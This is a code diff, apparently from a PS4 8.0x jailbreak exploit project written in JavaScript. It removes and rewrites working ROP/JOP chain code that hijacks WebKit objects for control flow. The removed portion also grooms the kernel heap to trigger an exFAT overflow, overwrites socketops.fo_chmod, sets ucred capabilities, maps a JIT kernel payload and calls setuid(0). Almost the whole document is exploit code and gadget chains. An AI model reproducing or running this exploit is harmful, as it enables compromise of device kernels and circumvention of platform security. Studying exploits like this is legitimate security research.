-        this.delta_slot = this.position;
-        this.push_constant(0);
-
-        this.push_gadget('neg rax; and rax, rcx; ret');
-        this.push_gadget('pop rdi; ret');
-        this.push_value(this.flag_addr);
-        this.push_gadget('mov qword ptr [rdi], rax; ret');
-
-        // clobbers rax, rcx, rdx, rsi
-        //
-        // rcx = rsp_position
-        // rsi = rsp
-        // rcx += rsi
-        // rdx = rcx
-        //
-        // dummy value, overwritten later at the end of start_branch()
-        this.push_gadget('pop rcx; ret');
-        this.rsp_slot = this.position;
-        this.push_constant(0);
-
-        this.push_gadget('pop rsi; ret');
-        this.push_value(this.stack_addr.add(this.position + 8));
-
-        // rsp collected here, start counting how much to perturb rsp
-        this.branch_position = 0;
-        this.is_branch_ctx = true;
-
-        this.push_gadget('add rcx, rsi; and rdx, rcx; or rax, rdx; ret');
-        this.push_gadget('mov rdx, rcx; ret');
-
-        // clobbers rax
-        //
-        // rax = *flag_addr
-        this.push_gadget('pop rax; ret');
-        this.push_value(this.flag_addr);
-        this.push_gadget('mov rax, qword ptr [rax]; ret');
-
-        // clobbers rax
-        //
-        // rax += rdx
-        // new_rsp = rax
-        this.push_gadget('add rax, rdx; ret');
-
-        // clobbers rdi
-        //
-        // for debugging, save new_rsp to flag_addr so we can verify it later
-        this.push_gadget('pop rdi; ret');
-        this.push_value(this.flag_addr);
-        this.push_gadget('mov qword ptr [rdi], rax; ret');
-
-        // clobbers rdx, rcx
-        //
-        // rdx = rax
-        this.push_gadget('pop rcx; ret');
-        this.push_constant(0);
-        this.push_gadget('mov rdx, rax; xor eax, eax; shl rdx, cl; ret');
-
-        // clobbers rax, rdx, rdi, rsp
-        //
-        // rsp = rdx
-        this.push_gadget('pop rax; ret');
-        this.push_value(get_view_vector(this.jmp_target));
-        this.push_gadget('pop rdi; jmp qword ptr [rax + 0x50]');
-        this.push_constant(0); // padding for the push
-
-        this.rsp_position = this.branch_position;
-        rw.write64(this.stack, this.rsp_slot, new Int(this.rsp_position));
-    }
-
-    end_branch() {
-        if (!this.is_branch_ctx) {
-            throw Error('can not end nonbranching chain');
-        }
-
-        const delta = this.branch_position - this.rsp_position;
-        rw.write64(this.stack, this.delta_slot, new Int(delta));
-        this._clean_branch_ctx();
-    }
-
-    // clobbers rax, rdi, rsi
-    push_save() {
-        if (this.is_saved) {
-            throw Error('restore first before saving again');
-        }
-        this.push_call(this.get_gadget('setjmp'), this.jmp_buf_p);
-        this.is_saved = true;
-    }
-
-    // Force a push_restore() if at runtime you can ensure the save/restore
-    // pair line up.
-    push_restore(is_force=false) {
-        if (!this.is_saved && !is_force) {
-            throw Error('save first before restoring');
-        }
-        // modify jmp_buf.rsp
-        this.push_gadget('pop rax; ret');
-        const rsp_slot = this.position;
-        // dummy value, overwritten later at the end of push_restore()
-        this.push_constant(0);
-        this.push_gadget('pop rdi; ret');
-        this.push_value(this.jmp_buf_p.add(0x38));
-        this.push_gadget('mov qword ptr [rdi], rax; ret');
-
-        // modify jmp_buf.return_address
-        this.push_gadget('pop rax; ret');
-        this.push_value(this.get_gadget('ret'));
-        this.push_gadget('pop rdi; ret');
-        this.push_value(this.jmp_buf_p.add(0x80));
-        this.push_gadget('mov qword ptr [rdi], rax; ret');
-
-        this.push_call(this.get_gadget('longjmp'), this.jmp_buf_p);
-
-        // Padding as longjmp() pushes the rdi and return address in the
-        // jmp_buf at the target rsp.
-        this.push_constant(0);
-        this.push_constant(0);
-        const target_rsp = this.stack_addr.add(this.position);
-
-        rw.write64(this.stack, rsp_slot, target_rsp);
-        this.is_saved = false;
+        this.push_gadget('leave; ret');
     }
 
     push_get_retval() {
@@ -468,821 +170,90 @@ class Chain800Base extends ChainBase {
         this.push_gadget('mov qword ptr [rdi], rax; ret');
     }
 
-    call(...args) {
-        if (this.position !== 0) {
-            throw Error('call() needs an empty chain');
-        }
-        this.push_call(...args);
-        this.push_get_retval();
-        this.push_end();
-        this.run();
-        this.clean();
+    push_get_errno() {
+        this.push_gadget('pop rdi; ret');
+        this.push_value(this.errno_addr);
 
-        return this.return_value;
+        this.push_call(this.get_gadget('__error'));
+
+        this.push_gadget('mov rax, qword ptr [rax]; ret');
+        this.push_gadget('mov dword ptr [rdi], eax; ret');
     }
 
-    syscall(...args) {
-        if (this.position !== 0) {
-            throw Error('syscall() needs an empty chain');
-        }
-        this.push_syscall(...args);
-        this.push_get_retval();
-        this.push_end();
-        this.run();
-        this.clean();
-
-        return this.return_value;
+    push_clear_errno() {
+        this.push_call(this.get_gadget('__error'));
+        this.push_gadget('pop rsi; ret');
+        this.push_value(0);
+        this.push_gadget('mov dword ptr [rax], esi; ret');
     }
 }
 
-// helper object for ROP
-const rop_ta = document.createElement('textarea');
-
-// Chain for PS4 8.03
-class Chain800 extends Chain800Base {
+export class Chain800 extends Chain800Base {
     constructor() {
         super();
-
-        // sizeof JSC:JSObject, the JSCell + the butterfly field
-        const js_size = 0x10;
-        // sizeof WebCore::JSHTMLTextAreaElement, subclass of JSObject
-        const js_ta_size = 0x20;
-        // start of the array of inline properties (JSValues)
-        const offset_js_inline_prop = 0x10;
-        // Sizes may vary between webkit versions so we just assume a size
-        // that we think is large enough for all of them.
-        const vtable_size = 0x1000;
-        const webcore_ta_size = 0x180;
-
-        // Empty objects have 6 inline properties that are not inspected by the
-        // GC. This gives us 48 bytes of free space that we can write with
-        // anything.
-        const ta_clone = {};
-        this.ta_clone = ta_clone;
-        const clone_p = mem.addrof(ta_clone);
-        const ta_p = mem.addrof(rop_ta);
-
-        // Copy the contents of the textarea before copying the JSCell. As long
-        // the JSCell is of an empty object, the GC will not inspect the inline
-        // storage.
-        //
-        // MarkedBlocks serve memory in fixed-size chunks (cells). The chunk
-        // size is also called the cell size. Even if you request memory whose
-        // size is less than a cell, the entire cell is allocated for the
-        // object.
-        //
-        // The cell size of the MarkedBlock where the empty object is allocated
-        // is atleast 64 bytes (enough to fit the empty object). So even if we
-        // change the JSCell later and the perceived size of the object
-        // (js_ta_size) is less than 64 bytes, we don't have to worry about the
-        // memory area between clone_p + js_ta_size and clone_p + cell_size
-        // being freed and reused because the entire cell belongs to the object
-        // until it dies.
-        for (let i = js_size; i < js_ta_size; i += 8) {
-            clone_p.write64(i, ta_p.read64(i));
-        }
-
-        // JSHTMLTextAreaElement is a subclass of JSC::JSDestructibleObject and
-        // thus they are allocated on a MarkedBlock with special attributes
-        // that tell the GC to have their destructor clean their storage on
-        // their death.
-        //
-        // The destructor in this case will destroy m_wrapped since they are a
-        // subclass of WebCore::JSDOMObject as well.
-        //
-        // What's great about the clones (initially empty objects) is that they
-        // are instances of JSC::JSFinalObject. That type doesn't have a
-        // destructor and so they are allocated on MarkedBlocks that don't need
-        // destruction.
-        //
-        // So even if a clone dies, the GC will not look for a destructor and
-        // try to run it. This means we can fake m_wrapped and not fear of any
-        // sort of destructor being called on it.
-
-        const webcore_ta = ta_p.readp(offset_textarea_impl);
-        const m_wrapped_clone = new Uint8Array(
-            make_buffer(webcore_ta, webcore_ta_size)
-        );
-        this.m_wrapped_clone = m_wrapped_clone;
-
-        // Replicate the vtable as much as possible or else the garbage
-        // collector will crash. It uses functions from the vtable.
-        //
-        // There is no need to restore the original vtable pointer later since
-        // it points to a copy with only offset 0x1c8 changed. The scrollLeft
-        // getter is not used by the GC.
-        const vtable_clone = new Uint8Array(
-            make_buffer(webcore_ta.readp(0), vtable_size)
-        );
-        this.vtable_clone = vtable_clone
-
-        clone_p.write64(
-            offset_textarea_impl,
-            get_view_vector(m_wrapped_clone),
-        );
-        rw.write64(m_wrapped_clone, 0, get_view_vector(vtable_clone));
-
-        // turn the empty object into a textarea (copy JSCell header)
-        //
-        // Don't need to copy the butterfly since it's by default NULL and it
-        // doesn't have any special meaning for the JSHTMLTextAreaObject type,
-        // unlike other types that uses it for something else.
-        //
-        // An example is a JSArrayBufferView with m_mode >= WastefulTypedArray,
-        // their *(butterfly - 8) is a pointer to a JSC::ArrayBuffer.
-        clone_p.write64(0, ta_p.read64(0));
-
-        // 0x1c8 is the offset of the scrollLeft getter native function
-        rw.write64(vtable_clone, 0x1c8, this.get_gadget(jop1));
-
-        // for the JOP chain
-        const rax_ptrs = new Uint8Array(0x100);
-        const rax_ptrs_p = get_view_vector(rax_ptrs);
-        this.rax_ptrs = rax_ptrs;
-
-        rw.write64(rax_ptrs, 0x28, this.get_gadget(jop2));
-        rw.write64(rax_ptrs, 0x5f, this.get_gadget(jop3));
-        rw.write64(rax_ptrs, 0x30, this.get_gadget(jop4));
-        rw.write64(rax_ptrs, 0x10, this.get_gadget(jop5));
-        rw.write64(rax_ptrs, 0, this.get_gadget(jop6));
-        // value to pivot rsp to
-        rw.write64(rax_ptrs, 0x18, this.stack_addr);
-
-        const jop_buffer = new Uint8Array(8);
-        const jop_buffer_p = get_view_vector(jop_buffer);
-        this.jop_buffer = jop_buffer;
-
-        rw.write64(jop_buffer, 0, rax_ptrs_p);
-
-        // Write the needed data by the JOP chain (mov rdi, qword ptr [rsi +
-        // 0x20]) at offset 0x20 (3rd inline property of the empty object) from
-        // the address of the cloned textarea.
-        //
-        // We could have passed the data by another offset like via the
-        // m_classInfo field ([rsi + 0x10]) but the contents of a
-        // JSHTMLTextAreaElement is not safe to change since it is used by the
-        // GC. Even if we restore them immediately, there is a small time frame
-        // where the GC could use the invalid contents.
-        clone_p.write64(offset_js_inline_prop + 8*2, jop_buffer_p);
+        const [rdx, rdx_bak] = mem.gc_alloc(0x58);
+        rdx.write64(off.js_cell, this._empty_cell);
+        rdx.write64(0x50, this.stack_addr);
+        this._rsp = mem.fakeobj(rdx);
     }
 
     run() {
-        this.check_stale();
-        this.check_is_empty();
-        this.check_is_branching();
-
-        // jump to JOP chain
-        this.ta_clone.scrollLeft;
+        this.check_allow_run();
+        this._rop.launch = this._rsp;
+        this.dirty();
     }
 }
-const Chain = Chain800;
 
-function init(Chain) {
+export const Chain = Chain800;
+
+export function init(Chain) {
+    const syscall_array = [];
     [libwebkit_base, libkernel_base, libc_base] = get_bases();
 
     init_gadget_map(gadgets, webkit_gadget_offsets, libwebkit_base);
     init_gadget_map(gadgets, libc_gadget_offsets, libc_base);
+    init_gadget_map(gadgets, libkernel_gadget_offsets, libkernel_base);
     init_syscall_array(syscall_array, libkernel_base, 300 * KB);
-    debug_log('syscall_array:');
-    debug_log(syscall_array);
+
+    let gs = Object.getOwnPropertyDescriptor(window, 'location').set;
+    // JSCustomGetterSetter.m_getterSetter
+    gs = mem.addrof(gs).readp(0x28);
+
+    // sizeof JSC::CustomGetterSetter
+    const size_cgs = 0x18;
+    const [gc_buf, gc_back] = mem.gc_alloc(size_cgs);
+    mem.cpy(gc_buf, gs, size_cgs);
+    // JSC::CustomGetterSetter.m_setter
+    gc_buf.write64(0x10, get_gadget(gadgets, jop1));
+
+    const proto = Chain.prototype;
+    // _rop must have a descriptor initially in order for the structure to pass
+    // setHasReadOnlyOrGetterSetterPropertiesExcludingProto() thus forcing a
+    // call to JSObject::putInlineSlow(). putInlineSlow() is the code path that
+    // checks for any descriptor to run
+    //
+    // the butterfly's indexing type must be something the GC won't inspect
+    // like DoubleShape. it will be used to store the JOP table's pointer
+    const _rop = {get launch() {throw Error('never call')}, 0: 1.1};
+    // replace .launch with the actual custom getter/setter
+    mem.addrof(_rop).write64(off.js_inline_prop, gc_buf);
+    proto._rop = _rop;
+
+    // JOP table
+    const rax_ptrs = new BufferView(0x100);
+    const rax_ptrs_p = get_view_vector(rax_ptrs);
+    proto._rax_ptrs = rax_ptrs;
+
+    rax_ptrs.write64(0x70, get_gadget(gadgets, jop2));
+    rax_ptrs.write64(0x30, get_gadget(gadgets, jop3));
+    rax_ptrs.write64(0x40, get_gadget(gadgets, jop4));
+    rax_ptrs.write64(0, get_gadget(gadgets, jop5));
+
+    const jop_buffer_p = mem.addrof(_rop).readp(off.js_butterfly);
+    jop_buffer_p.write64(0, rax_ptrs_p);
+
+    const empty = {};
+    proto._empty_cell = mem.addrof(empty).read64(off.js_cell);
+
     Chain.init_class(gadgets, syscall_array);
 }
-
-function test_rop(Chain) {
-    const jmp_buf = new Uint8Array(jmp_buf_size);
-    const jmp_buf_p = get_view_vector(jmp_buf);
-
-    init(Chain);
-
-    setjmp_addr = gadgets.get('setjmp');
-    longjmp_addr = gadgets.get('longjmp');
-
-    const chain = new Chain();
-    // Instead of writing to the jmp_buf, set rax here so it will be restored
-    // as the return value after the longjmp().
-    chain.push_gadget('pop rax; ret');
-    chain.push_constant(1);
-    chain.push_call(setjmp_addr, jmp_buf_p);
-
-    chain.start_branch();
-
-    debug_log(`if chain addr: ${chain.stack_addr.add(chain.position)}`);
-    chain.push_call(longjmp_addr, jmp_buf_p);
-
-    chain.end_branch();
-
-    debug_log(`endif chain addr: ${chain.stack_addr.add(chain.position)}`);
-    chain.push_end();
-
-    // The ROP chain is a noop. If we crashed, then we did something wrong.
-    alert('chain run');
-    debug_log('test call setjmp()/longjmp()');
-    chain.run()
-    alert('returned successfully');
-    debug_log('returned successfully');
-    debug_log('jmp_buf:');
-    debug_log(jmp_buf);
-    debug_log(`flag: ${rw.read64(chain.flag, 0)}`);
-
-    const state1 = new Uint8Array(8);
-    debug_log('test if rax == 0');
-    chain.clean();
-
-    chain.push_gadget('pop rsi; ret');
-    chain.push_value(get_view_vector(state1));
-    chain.push_save();
-    chain.push_gadget('pop rax; ret');
-    chain.push_constant(0);
-
-    chain.start_branch();
-    chain.push_restore();
-
-    chain.push_gadget('pop rcx; ret');
-    chain.push_constant(1);
-    chain.push_gadget('mov qword ptr [rsi], rcx; ret');
-    chain.push_end();
-
-    chain.end_branch();
-
-    chain.push_restore(true);
-    chain.push_gadget('pop rcx; ret');
-    chain.push_constant(2);
-    chain.push_gadget('mov qword ptr [rsi], rcx; ret');
-    chain.push_end();
-
-    chain.run();
-    debug_log(`state1 must be 1: ${state1}`);
-    if (state1[0] !== 1) {
-        die('if branch not taken');
-    }
-
-    const state2 = new Uint8Array(8);
-    debug_log('test if rax != 0');
-    chain.clean();
-
-    chain.push_gadget('pop rsi; ret');
-    chain.push_value(get_view_vector(state2));
-    chain.push_save();
-    chain.push_gadget('pop rax; ret');
-    chain.push_constant(1);
-
-    chain.start_branch();
-    chain.push_restore();
-
-    chain.push_gadget('pop rcx; ret');
-    chain.push_constant(1);
-    chain.push_gadget('mov qword ptr [rsi], rcx; ret');
-    chain.push_end();
-
-    chain.end_branch();
-
-    chain.push_restore(true);
-    chain.push_gadget('pop rcx; ret');
-    chain.push_constant(2);
-    chain.push_gadget('mov qword ptr [rsi], rcx; ret');
-    chain.push_end();
-
-    chain.run();
-    debug_log(`state2 must be 2: ${state2}`);
-    if (state2[0] !== 2) {
-        die('if branch taken');
-    }
-
-    debug_log('test syscall getuid()');
-    chain.clean();
-    // Set the return value to some random value. If the syscall worked, then
-    // it will likely change.
-    const magic = 0x4b435546;
-    rw.write32(chain._return_value, 0, magic);
-
-    const res = chain.syscall('getuid');
-
-    debug_log(`return value: ${res}`);
-    if (res.eq(magic)) {
-        die('syscall getuid failed');
-    }
-}
-
-function mlock_gadgets(gadgets) {
-    const chain = new Chain();
-
-    for (const [gadget, addr] of gadgets) {
-        // change this if you use longer gadgets
-        const max_gadget_length = 0x50;
-        chain.push_syscall('mlock', addr, max_gadget_length);
-    }
-    chain.push_end();
-    chain.run();
-    chain.clean();
-}
-
-function mlock_kchain(kchain) {
-    const chain = new Chain();
-    const stack_buffer = kchain.stack_buffer;
-    const stack_buffer_p = get_view_vector(new Uint8Array(stack_buffer));
-    // have a view point to the buffer of stack_buffer
-    chain.syscall('mlock', stack_buffer_p, stack_buffer.byteLength);
-    chain.syscall('mlock', kchain.retval_addr, kchain._return_value.length);
-    chain.syscall('mlock', kchain.jmp_buf_p, kchain.jmp_buf.length);
-}
-
-// pivots back to the original kernel stack with interrupts enabled
-function push_krop_end(kchain) {
-    // leave
-    // jmp gadgets['sti; ret']
-    kchain.push_gadget('pop rcx; ret');
-    kchain.push_value(kchain.get_gadget('sti; ret'));
-    kchain.push_gadget('leave; jmp rcx');
-}
-
-// The initial kernel patch will be to modify socketops.fo_chmod so that we can
-// run later kernel code via calling fchmod() on a socket descriptor.
-function prepare_knote(kchain) {
-    const chain = new Chain();
-    const size = 0x4000;
-    // PROT_READ | PROT_WRITE
-    const prot_rw = 3;
-    const MAP_ANON = 0x1000;
-    const MAP_FIXED = 0x10;
-
-    const mmap_area = new Addr(
-        chain.syscall(
-            'mmap',
-            0x4000,
-            size,
-            prot_rw,
-            MAP_ANON | MAP_FIXED,
-            -1,
-            0,
-        )
-    );
-
-    const knote = mmap_area;
-
-    debug_log(`knote addr: ${knote}`);
-    if (!knote.eq(0x4000)) {
-        die('mmap() failed');
-    }
-
-    const filterops = mmap_area.add(0x200);
-    const jop_buffer = mmap_area.add(0x1000);
-    const rax_ptrs = mmap_area.add(0x1008);
-    // scratch area used later
-    const scratch = mmap_area.add(0x2000);
-
-    const offset_kn_fop = 0x68;
-    knote.write64(0, jop_buffer);
-    knote.write64(offset_kn_fop, filterops);
-
-    const offset_f_detach = 0x10;
-    filterops.write64(offset_f_detach, kchain.get_gadget(kjop1));
-
-    jop_buffer.write64(0, rax_ptrs);
-
-    // for the kernel JOP chain
-    rax_ptrs.write64(0xe0, kchain.get_gadget(jop3));
-    rax_ptrs.write64(0x30, kchain.get_gadget(jop4));
-    rax_ptrs.write64(0x10, kchain.get_gadget(jop5));
-    // We need to cli before the pivot (to a user mode rsp) and to sti after
-    // the back pivot (the system needs to handle interrupts after all).
-    //
-    // Since ps4 5.00, a pseudo-SMAP mitigation has been employed. The thread
-    // scheduler checks if the stack pointer of a kernel thread is pointing to
-    // kernel memory, if not, crash the system.
-    rax_ptrs.write64(0, kchain.get_gadget('cli; jmp qword ptr [rax + 0x43]'));
-    rax_ptrs.write64(0x43, kchain.get_gadget(jop6));
-    // value to pivot rsp to
-    rax_ptrs.write64(0x18, kchain.stack_addr);
-
-    // * there are 2 calls to f_detach() in kqueue_close()
-    // * offset relative to the return address of the first f_detach()
-    // * epi = address of the epilogue of kqueue_close()
-    // kqueue_close() epilogue
-    const offset_kqueue_close_epi = 689;
-    // offset relative to epi
-    const offset_socketops = 0x179f39f;
-
-    // get kernel stack pointer
-    kchain.push_gadget('xchg rbp, rax; ret');
-    // ret_addr = *(rbp + 8)
-    kchain.push_gadget('add rax, 8; ret');
-    kchain.push_get_retval();
-    kchain.push_gadget('mov rax, qword ptr [rax]; ret');
-    // ret_addr += offset_kqueue_close_epi
-    kchain.push_gadget('pop rdx; ret');
-    kchain.push_constant(offset_kqueue_close_epi);
-    kchain.push_gadget('add rax, rdx; ret');
-    // modify return address to jump to the epilogue
-    // *(rbp + 8) = ret_addr
-    kchain.push_gadget('pop rcx; ret');
-    kchain.push_value(kchain.retval_addr);
-    kchain.push_gadget('mov rdx, qword ptr [rcx]; ret');
-    // save rax as it will get clobbered and we still need it
-    // currently, rax = epi
-    kchain.push_get_retval();
-    kchain.push_gadget('mov qword ptr [rdx], rax; mov al, 1; ret');
-
-    // restore rbp
-    kchain.push_gadget('pop rax; ret');
-    kchain.push_constant(-8);
-    kchain.push_gadget('add rax, rdx; ret');
-    kchain.push_gadget('xchg rbp, rax; ret');
-
-    // restore rax
-    kchain.push_gadget('pop rax; ret');
-    kchain.push_value(kchain.retval_addr);
-    kchain.push_gadget('mov rax, qword ptr [rax]; ret');
-
-    // socketops.fo_chmod = k2jop1
-    kchain.push_gadget('pop rdx; ret');
-    kchain.push_constant(offset_socketops + 0x40);
-    kchain.push_gadget('add rax, rdx; ret');
-    // also saves a kernel address (&socketops.fo_chmod)
-    kchain.push_get_retval();
-    kchain.push_gadget('pop rcx; ret');
-    kchain.push_value(kchain.retval_addr);
-    kchain.push_gadget('mov rdx, qword ptr [rcx]; ret');
-    kchain.push_gadget('pop rax; ret');
-    kchain.push_value(kchain.get_gadget(k2jop1));
-    kchain.push_gadget('mov qword ptr [rdx], rax; mov al, 1; ret');
-
-    // We'll check address 0x4000 later as an additional test to see if the
-    // kchain ran.
-    kchain.push_gadget('pop rdi; ret');
-    kchain.push_constant(0x4000);
-    kchain.push_gadget('pop rsi; ret');
-    kchain.push_constant('0xdeadbeefbeefdead');
-    kchain.push_gadget('mov qword ptr [rdi], rsi; ret');
-
-    push_krop_end(kchain);
-
-    chain.syscall('mlock', knote, size);
-
-    // the mmaped area will be reused for the fchmod() kernel ROP chain
-    return [mmap_area, size, jop_buffer, rax_ptrs, scratch];
-}
-
-// malloc/free until the heap is shaped in a certain way, such that the exFAT
-// heap oveflow bug overwrites a struct klist
-function trigger_oob(kchain, mmap_area) {
-    const chain = new Chain();
-
-    const num_kqueue = 0x1b0;
-    const kqueues = new Uint32Array(num_kqueue);
-    const kqueues_p = get_view_vector(kqueues);
-
-    for (let i = 0; i < num_kqueue; i++) {
-        chain.push_syscall('kqueue');
-        chain.push_gadget('pop rdi; ret');
-        chain.push_value(kqueues_p.add(i * 4));
-        chain.push_gadget('mov dword ptr [rdi], eax; ret');
-    }
-    chain.push_end();
-    chain.run();
-    chain.clean();
-
-    const AF_INET = 2;
-    const SOCK_STREAM = 1;
-    // socket file descriptor
-    const sd = chain.syscall('socket', AF_INET, SOCK_STREAM, 0);
-    // We suspect why they want a specific file descriptor is because
-    // kqueue_expand() allocates memory whose size depends on the file
-    // descriptor number.
-    //
-    // The specific malloc size is probably a part in their method in shaping
-    // the heap.
-    //
-    // socket() returns an int (32-bit signed integer)
-    // if sd.high() !== 0, socket() returned an error
-    if (sd.low() < 0x100 || sd.low() >= 0x200 || sd.high() !== 0) {
-        die(`invalid socket: ${sd}`);
-    }
-    debug_log(`socket descriptor: ${sd}`);
-
-    // spray kevents
-    const kevent = new Uint8Array(0x20);
-    const kevent_p = get_view_vector(kevent);
-    kevent_p.write64(0, sd);
-    // EV_ADD and EVFILT_READ
-    kevent_p.write32(0x8, 0x1ffff);
-    kevent_p.write32(0xc, 0);
-    kevent_p.write64(0x10, Int.Zero);
-    kevent_p.write64(0x18, Int.Zero);
-
-    for (let i = 0; i < num_kqueue; i++) {
-        // nchanges == 1, everything else is NULL/0
-        chain.push_syscall('kevent', kqueues[i], kevent_p, 1, 0, 0, 0);
-    }
-    chain.push_end();
-    chain.run();
-    chain.clean();
-
-    // fragment memory
-    for (let i = 18; i < num_kqueue; i += 2) {
-        chain.push_syscall('close', kqueues[i]);
-    }
-    chain.push_end();
-    chain.run();
-    chain.clean();
-
-    // trigger OOB
-    alert('insert USB');
-
-    // trigger corrupt knote
-    for (let i = 1; i < num_kqueue; i += 2) {
-        chain.push_syscall('close', kqueues[i]);
-    }
-    chain.push_end();
-    chain.run();
-    chain.clean();
-
-    const kretval = kchain.return_value;
-    debug_log(`kchain retval: ${kretval}`);
-    debug_log(kchain.jmp_buf);
-    const check = mmap_area.read64(0);
-    debug_log(check);
-    if (kretval.eq(0)) {
-        die('heap overflow failed');
-    }
-    debug_log('kernel ROP chain ran successfully');
-    kchain.clean();
-
-    // reuse sd for the fchmod() kernel ROP chain
-    return [sd, kretval];
-}
-
-// socketops.fo_chmod() was previously invfo_chmod(), which just returned
-// EINVAL
-function push_ret_einval(kchain) {
-    const EINVAL = 22;
-    kchain.push_gadget('pop rax; ret');
-    kchain.push_constant(EINVAL);
-}
-
-function get_ucred_addr(kchain, sd, mmap_area) {
-    const chain = new Chain();
-    const offset_jmp_buf_rcx = 0x10;
-    const offset_thread_td_proc = 8;
-    const offset_proc_p_ucred = 0x40;
-
-    // we enter fo_chmod with rcx containing the "struct thread td" argument
-    kchain.push_save();
-
-    // rax = td
-    kchain.push_gadget('pop rax; ret');
-    kchain.push_value(kchain.jmp_buf_p);
-    kchain.push_gadget('pop rdx; ret');
-    kchain.push_constant(offset_jmp_buf_rcx);
-    kchain.push_gadget('add rax, rdx; ret');
-    kchain.push_gadget('mov rax, qword ptr [rax]; ret');
-    // rax = td->td_proc
-    kchain.push_gadget('pop rdx; ret');
-    kchain.push_constant(offset_thread_td_proc);
-    kchain.push_gadget('add rax, rdx; ret');
-    kchain.push_gadget('mov rax, qword ptr [rax]; ret');
-    // rax = td->td_proc->p_ucred
-    kchain.push_gadget('pop rdx; ret');
-    kchain.push_constant(offset_proc_p_ucred);
-    kchain.push_gadget('add rax, rdx; ret');
-    kchain.push_gadget('mov rax, qword ptr [rax]; ret');
-
-    kchain.push_get_retval();
-
-    kchain.push_restore();
-
-    push_ret_einval(kchain);
-
-    push_krop_end(kchain);
-
-    chain.syscall('fchmod', sd, mmap_area);
-    kchain.clean();
-
-    return kchain.return_value;
-}
-
-function get_jit_capabilities(kchain, sd, mmap_area, ucred_addr) {
-    const chain = new Chain();
-    // struct ucred has been customized for the ps4
-    //
-    // See
-    // OpenOrbis/mira-project/external/freebsd-headers/include/sys/ucred.h
-    // at https://github.com for the definition.
-    //
-    // Credits to CelesteBlue and Cryptogenic for telling which cr_sceCaps[x]
-    // to modify. Da Puppeh for the definition of ucred.
-    const p_ucred = ucred_addr;
-
-    // cr_sceCaps[0]
-    kchain.push_write64(p_ucred.add(0x60), new Int(-1));
-    // cr_sceCaps[1]
-    kchain.push_write64(p_ucred.add(0x68), new Int(-1));
-
-    push_ret_einval(kchain);
-
-    push_krop_end(kchain);
-
-    chain.syscall('fchmod', sd, mmap_area);
-    kchain.clean();
-}
-
-async function kexec_payload(kchain, sd, mmap_area, scratch) {
-    const chain = new Chain();
-    const map_size = 0x100000;
-    // PROT_READ | PROT_WRITE | PROT_EXEC
-    const prot_rwx = 7;
-    // PROT_READ | PROT_EXEC
-    const prot_rx = 5;
-    // PROT_READ | PROT_WRITE
-    const prot_rw = 3;
-    const MAP_SHARED = 1;
-
-    const exec_handle = chain.syscall('jitshm_create', 0, map_size, prot_rwx);
-    const write_handle = chain.syscall('jitshm_alias', exec_handle, prot_rw);
-
-    const exec_addr = new Addr(
-        chain.syscall(
-            'mmap',
-            '0x900000000',
-            map_size,
-            prot_rx,
-            MAP_SHARED, // this flag is required
-            exec_handle,
-            0,
-        )
-    );
-
-    const write_addr = new Addr(
-        chain.syscall(
-            'mmap',
-            '0x910000000',
-            map_size,
-            prot_rw,
-            MAP_SHARED, // this flag is required
-            write_handle,
-            0,
-        )
-    );
-
-    debug_log(`exec_addr: ${exec_addr}`);
-    debug_log(`write_addr: ${write_addr}`);
-    if (!exec_addr.eq('0x900000000') && !write_addr.eq('0x910000000')) {
-        die('mmap() for jit failed');
-    }
-
-    // mov eax, 0x1337; ret
-    const test_code = new Int('0xc300001337b8');
-
-    write_addr.write64(0, test_code);
-    alert('test jit exec');
-    let retval = chain.call(exec_addr);
-    alert('returned successfully');
-
-    debug_log(`jit retval: ${retval}`);
-    if (!retval.eq(0x1337)) {
-        die('test jit exec failed');
-    }
-
-    const buf = await get_patches('./kpatch/80x.elf');
-    // start of loadable segments is at offset 0x1000
-    const patches = new Uint8Array(buf, 0x1000);
-
-    if (patches.length > map_size) {
-        die(`patch file too large (>${$map_size}): ${patches.length}`);
-    }
-
-    // copy the file to executable memory
-    mem.set_addr(write_addr);
-    mem.worker.set(patches);
-
-    // Modify the stack frame so that we jump to exec_addr with interrupts
-    // enabled and rsp is a kernel address.
-    kchain.push_save();
-
-    // scratch[0] = rbp
-    kchain.push_gadget('xchg rbp, rax; ret');
-    kchain.push_gadget('pop rdi; ret');
-    kchain.push_value(scratch);
-    kchain.push_gadget('mov qword ptr [rdi], rax; ret');
-
-    // scratch[8] = old_rbp
-    kchain.push_gadget('mov rax, qword ptr [rax]; ret');
-    kchain.push_gadget('pop rdi; ret');
-    kchain.push_value(scratch.add(8));
-    kchain.push_gadget('mov qword ptr [rdi], rax; ret');
-
-    // rax = rbp
-    kchain.push_gadget('pop rax; ret');
-    kchain.push_value(scratch);
-    kchain.push_gadget('mov rax, qword ptr [rax]; ret');
-
-    // rax -= 8
-    kchain.push_gadget('pop rdx; ret');
-    kchain.push_constant(-8);
-    kchain.push_gadget('add rax, rdx; ret');
-
-    // scratch[0x10] = rbp - 8
-    kchain.push_gadget('pop rdi; ret');
-    kchain.push_value(scratch.add(0x10));
-    kchain.push_gadget('mov qword ptr [rdi], rax; ret');
-
-    // rdx = rbp - 8
-    kchain.push_gadget('pop rcx; ret');
-    kchain.push_value(scratch.add(0x10));
-    kchain.push_gadget('mov rdx, qword ptr [rcx]; ret');
-
-    // rax = old_rbp
-    kchain.push_gadget('pop rax; ret');
-    kchain.push_value(scratch.add(8));
-    kchain.push_gadget('mov rax, qword ptr [rax]; ret');
-
-    // *(rbp - 8) = old_rbp
-    kchain.push_gadget('mov qword ptr [rdx], rax; mov al, 1; ret');
-
-    // rdx = rbp
-    kchain.push_gadget('pop rcx; ret');
-    kchain.push_value(scratch);
-    kchain.push_gadget('mov rdx, qword ptr [rcx]; ret');
-
-    // *rbp = exec_addr
-    kchain.push_gadget('pop rax; ret');
-    kchain.push_value(exec_addr);
-    kchain.push_gadget('mov qword ptr [rdx], rax; mov al, 1; ret');
-
-    kchain.push_restore();
-
-    // rbp -= 8
-    kchain.push_gadget('xchg rbp, rax; ret');
-    kchain.push_gadget('pop rdx; ret');
-    kchain.push_constant(-8);
-    kchain.push_gadget('add rax, rdx; ret');
-    kchain.push_gadget('xchg rbp, rax; ret');
-
-    // have the payload return EINVAL for us, read push_ret_einval() for why
-    const EINVAL = 22;
-    // kpatch(EINVAL, NULL)
-    kchain.push_gadget('pop rdi; ret');
-    kchain.push_constant(EINVAL);
-    kchain.push_gadget('pop rsi; ret');
-    kchain.push_constant(0);
-
-    push_krop_end(kchain);
-
-    chain.syscall('mlock', exec_addr, map_size);
-
-    alert('test jit kexec');
-    chain.syscall('fchmod', sd, mmap_area);
-    kchain.clean();
-
-    retval = chain.syscall('setuid', 0);
